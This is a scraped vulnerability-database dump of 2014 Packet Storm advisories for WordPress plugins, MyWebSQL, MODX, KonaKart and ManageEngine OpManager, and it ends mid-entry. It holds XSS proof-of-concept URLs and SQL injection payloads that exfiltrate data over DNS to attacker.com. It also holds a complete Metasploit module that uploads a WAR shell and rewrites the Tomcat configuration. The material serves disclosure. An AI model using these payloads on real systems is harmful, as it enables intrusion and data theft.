(XSS) in Photo Gallery WordPress plugin: CVE-2014-6315 \n \n1.1 Input passed via the \"callback\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.2 Input passed via the \"dir\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.3 Input passed via the \"extensions\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Photo Gallery 1.1.31 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23232 - https://www.htbridge.com/advisory/HTB23232 - Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin. \n[2] Photo Gallery WordPress plugin - http://web-dorado.com/ - This plugin is a fully responsive gallery plugin with advanced functionality. It allows having different image galleries for your posts and pages. You can create unlimited number of galleries, combine them into albums, and provide descriptions and tags. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128518/wpphotogallery1130-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:16:11", "description": "", "published": "2014-09-22T00:00:00", "type": "packetstorm", "title": "KonaKart Storefront Application Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5516"], "modified": "2014-09-22T00:00:00", "id": "PACKETSTORM:128342", "href": "https://packetstormsecurity.com/files/128342/KonaKart-Storefront-Application-Cross-Site-Request-Forgery.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n \nCVE-2014-5516 \n=================== \n\"Cross-Site Request Forgery (CSRF) protection bypass\" (CWE-352) vulnerability \nin \"KonaKart Storefront Application\" Enterprise Java eCommerce product \n \n \nVendor \n=================== \nDS Data Systems (UK) Ltd. \n \n \nProduct \n=================== \n\"KonaKart is an affordable java based shopping cart software solution for online retailers. \nLet KonaKart help increase your eCommerce sales.\" \n- source: http://www.konakart.com \n \n\"KonaKart is a Java eCommerce system aimed at medium to large online retailers.\" \n- source: https://en.wikipedia.org/wiki/KonaKart \n \n \nAffected versions \n=================== \nThis vulnerability affects versions of KonaKart Storefront Application prior to 7.3.0.0 \n \n \nPatch \n=================== \nThe vendor has released a XSRF fix as part of version 7.3.0.0 at \nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new \n \n \nReported by \n=================== \nThis issue was reported to the vendor by Christian Schneider (@cschneider4711) \nfollowing a responsible disclosure process. \n \n \nSeverity \n=================== \nMedium \n \n \nDescription \n=================== \nThe existing CSRF protection token was checked for every POST request \nproperly. When modifying the request from POST method to GET method \nall state-changing actions worked as well, but the CSRF token protection \nwas no longer enforced, allowing CSRF attacks. \n \n \nEscalation potential \n==================== \nExploitation demonstration was responsibly provided along with the vulnerability \nreport to the vendor, which changed a victim's mail address (using the CSRF \nprotection bypass) to an attacker-supplied mail address, allowing a successful \nreset of victim's account password by the attacker. \n \n \nTimeline \n=================== \n2014-05-02 Vulnerability discovered \n2014-05-02 Vulnerability responsibly reported to vendor \n2014-05-02 Reply from vendor acknowledging report \n2014-??-?? Vendor released patch as part of version 7.3.0.0 \n2014-09-20 Advisory published via BugTraq \n \n \nReferences \n=================== \nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new \nhttp://www.christian-schneider.net/advisories/CVE-2014-5516.txt \n \n \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (Darwin) \n \niEYEARECAAYFAlQd69cACgkQXYAsOfddvFOTVACgr/f5+x5kf60t5LaCqhH0pvSY \nQYoAnjiI0WSa3iGuw/OfXk3/vLV+liFm \n=61mn \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 3.7, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128342/konakart-xsrf.txt"}, {"lastseen": "2016-12-05T22:17:52", "description": "", "published": "2014-09-03T00:00:00", "type": "packetstorm", "title": "MyWebSQL 3.4 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4735"], "modified": "2014-09-03T00:00:00", "id": "PACKETSTORM:128140", "href": "https://packetstormsecurity.com/files/128140/MyWebSQL-3.4-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23221 \nProduct: MyWebSQL \nVendor: http://mywebsql.net/ \nVulnerable Version(s): 3.4 and probably prior \nTested Version: 3.4 \nAdvisory Publication: June 25, 2014 [without technical details] \nVendor Notification: June 25, 2014 \nPublic Disclosure: September 3, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-4735 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Solution Available \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735 \n \nThe vulnerability is caused by insufficient sanitization of the \"table\" HTTP GET parameter passed to \"/index.php\" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it. \n \nThe following exploitation example uses the alert() JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nDisclosure timeline: \n2014-06-25 Vendor alerted via emails and contact form. \n2014-07-03 Vendor alerted via emails, contact form and twitter. \n2014-07-03 Vendor replied that he received information. \n2014-07-10 Fix requested. \n2014-07-10 Vendor requested to move public disclosure date to August 30. \n2014-08-27 Fix requested. \n2014-08-27 Vendor didn't release any patch and agreed to disclose on August 30 without patch. \n2014-08-27 Disclosure date moved to September 3. \n2014-09-01 Fix requested. \n2014-09-03 Public disclosure, patch by HTB Research is available. \n \nCurrently we are not aware of any official solution for this vulnerability. \nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23221-patch.zip \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23221 - https://www.htbridge.com/advisory/HTB23221 - Cross-Site Scripting (XSS) in MyWebSQL. \n[2] MyWebSQL - http://mywebsql.net/ - MyWebSQL is the ultimate desktop replacement for managing your MySQL databases over the web. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128140/mywebsql-xss.txt"}, {"lastseen": "2016-12-05T22:25:11", "description": "", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6034"], "modified": "2014-09-29T00:00:00", "id": "PACKETSTORM:128477", "href": "https://packetstormsecurity.com/files/128477/ManageEngine-OpManager-Social-IT-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload', \n'Description' => %q{ \nThis module exploits a file upload vulnerability in ManageEngine OpManager and Social IT. \nThe vulnerability exists in the FileCollector servlet which accepts unauthenticated \nfile uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on \nversion 11.0 of SocialIT for Windows and Linux. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-6034' ], \n[ 'OSVDB', '112276' ], \n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ] \n], \n'Privileged' => true, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Sep 27 2014')) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptInt.new('SLEEP', \n[true, 'Seconds to sleep while we wait for WAR deployment', 15]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"), \n'method' => 'GET' \n}) \n \n# A GET request on this servlet returns \"405 Method not allowed\" \nif res and res.code == 405 \nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \n \ndef upload_war_and_exec(try_again, app_base) \ntomcat_path = '../../../tomcat/' \nservlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector' \n \nif try_again \n# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration \n# does not allow us to deploy WARs. Fix that by uploading a new context.xml file. \n# The file we are uploading has the same content apart from privileged=\"false\" and lots of XML comments. \n# After replacing the context.xml file let's upload the WAR again. \nprint_status(\"#{peer} - Replacing Tomcat context file\") \nsend_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>}, \n'ctype' => 'application/xml', \n'vars_get' => { \n'regionID' => tomcat_path + \"conf\", \n'FILENAME' => \"context.xml\" \n} \n}) \nelse \n# We need to create the upload directories before our first attempt to upload the WAR. \nprint_status(\"#{peer} - Creating upload directories\") \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \nsend_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => rand_text_alphanumeric(4 + rand(32 - 4)), \n'ctype' => 'application/xml', \n'vars_get' => { \n'regionID' => \"\", \n'FILENAME' => bogus_file \n} \n}) \nregister_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file) \nend \n \nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s \n \nprint_status(\"#{peer} - Uploading WAR file...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => war_payload, \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'regionID' => tomcat_path + \"webapps\", \n'FILENAME' => app_base + \".war\" \n} \n}) \n \n# The server either returns a 500 error or a 200 OK when the upload is successful. \nif res and (res.code == 500 or res.code == 200) \nprint_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s + \n\" seconds for deployment\") \nsleep(datastore['SLEEP']) \nelse \nfail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\") \nend \n \nprint_status(\"#{peer} - Executing payload, wait for session...\") \nsend_request_cgi({ \n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), \n'method' => 'GET' \n}) \nend \n \n \ndef exploit \napp_base = rand_text_alphanumeric(4 + rand(32 - 4)) \n \nupload_war_and_exec(false, app_base) \nregister_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\") \n \nsleep_counter = 0 \nwhile not session_created? \nif sleep_counter == datastore['SLEEP'] \nprint_error(\"#{peer} - Failed to get a shell, let's try one more time\") \nupload_war_and_exec(true, app_base) \nreturn \nend \n \nsleep(1) \nsleep_counter += 1 \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128477/opmanager_socialit_file_upload.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:13:41", "description": "", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "packetstorm", "title": "All In One WP Security 3.8.2 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "id": "PACKETSTORM:128419", "href": "https://packetstormsecurity.com/files/128419/All-In-One-WP-Security-3.8.2-SQL-Injection.html", "sourceData": "`Advisory ID: HTB23231 \nProduct: All In One WP Security WordPress plugin \nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \nVulnerable Version(s): 3.8.2 and probably prior \nTested Version: 3.8.2 \nAdvisory Publication: September 3, 2014 [without technical details] \nVendor Notification: September 3, 2014 \nVendor Patch: September 12, 2014 \nPublic Disclosure: September 24, 2014 \nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-6242 \nRisk Level: Medium \nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \n \n \n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242 \n \n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.: \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \n \n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.: \n \n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\"> \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to All In One WP Security 3.8.3 \n \nMore Information: \nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin. \n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128419/aiowpsecurity-sql.txt", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:22:30", "description": "", "published": "2014-09-17T00:00:00", "type": "packetstorm", "title": "MODX Revolution 2.3.1-pl Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5451"], "modified": "2014-09-17T00:00:00", "id": "PACKETSTORM:128302", "href": "https://packetstormsecurity.com/files/128302/MODX-Revolution-2.3.1-pl-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23229 \nProduct: MODX Revolution \nVendor: MODX \nVulnerable Version(s): 2.3.1-pl and probably prior \nTested Version: 2.3.1-pl \nAdvisory Publication: August 20, 2014 [without technical details] \nVendor Notification: August 20, 2014 \nVendor Patch: September 11, 2014 \nPublic Disclosure: September 17, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-5451 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MODX Revolution: CVE-2014-5451 \n \nThe vulnerability exists due to insufficient sanitization of input data passed via the \"a\" HTTP GET parameter to \"/manager/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \nThis vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/manager/?a=%22%20onload=%22javascript:alert%28/immuniweb/%29;%22%3E \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate \"manager/templates/default/header.tpl\" file from GitHub. \n \nMore Information: \nhttps://github.com/modxcms/revolution/issues/11966 \nhttps://github.com/modxcms/revolution/commit/e36f80f18e9514204bf2ce82747c8adf7e47a9c9 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23229 - https://www.htbridge.com/advisory/HTB23229 - Reflected Cross-Site Scripting (XSS) in MODX Revolution. \n[2] MODX Revolution - http://modx.com - MODX Revolution is the web content management platform for those that truly care about no-compromise design and exceptional user experience. It gives you complete control over your site and content, with the flexibility and scalability to adapt to your changing needs. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128302/modxrevolution-xss.txt"}, {"lastseen": "2016-12-05T22:19:14", "description": "", "cvss3": {}, "published": "2014-10-09T00:00:00", "type": "packetstorm", "title": "WordPress EWWW Image Optimizer 2.0.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6243"], "modified": "2014-10-09T00:00:00", "id": "PACKETSTORM:128621", "href": "https://packetstormsecurity.com/files/128621/WordPress-EWWW-Image-Optimizer-2.0.1-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23234 \nProduct: EWWW Image Optimizer WordPress plugin \nVendor: Shane Bishop \nVulnerable Version(s): 2.0.1 and probably prior \nTested Version: 2.0.1 \nAdvisory Publication: September 17, 2014 [without technical details] \nVendor Notification: September 17, 2014 \nVendor Patch: September 24, 2014 \nPublic Disclosure: October 8, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-6243 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in EWWW Image Optimizer WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin. \n \n \n1) Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress plugin: CVE-2014-6243 \n \nInput passed via the \"page\" HTTP GET parameter to \"/wp-admin/options-general.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display administrator's cookies: \n \nhttp://wordpress/wp-admin/options-general.php?page=ewww-image-optimizer/ewww-image-optimizer.php&pngout=failed&error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to EWWW Image Optimizer 2.0.2. \n \nMore Information: \nhttps://wordpress.org/plugins/ewww-image-optimizer/changelog/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23234 - https://www.htbridge.com/advisory/HTB23234 - Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress Plugin. \n[2] EWWW Image Optimizer WordPress plugin - http://www.shanebishop.net/ - Reduce file sizes for images within WordPress including NextGEN Gallery and GRAND FlAGallery. Uses jpegtran, optipng/pngout, and gifsicle. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128621/wpewwwio-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "description": "The Zarafa Collaboration Platform is a Microsoft Exchange replacement. The Open Source Collaboration provides an integration with your existing Linux mail server, native mobile phone support by ActiveSync compatibility and a webaccess with 'Look & Feel' similar to Outlook using Ajax. Including an IMAP and a POP3 gateway as well as an iCal/CalDAV gateway, the Zarafa Open Source Collaboration can combine the usability with the stability and the flexibility of a Linux server. The proven Zarafa groupware solution is using MAPI objects, provides a MAPI client library as well as programming interfaces for C++, PHP and Python. The other Zarafa related packages need to be installed to gain all features and benefits of the Zarafa Collaboration Platform (ZCP). ", "cvss3": {}, "published": "2014-08-30T03:55:03", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: zarafa-7.1.10-4.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 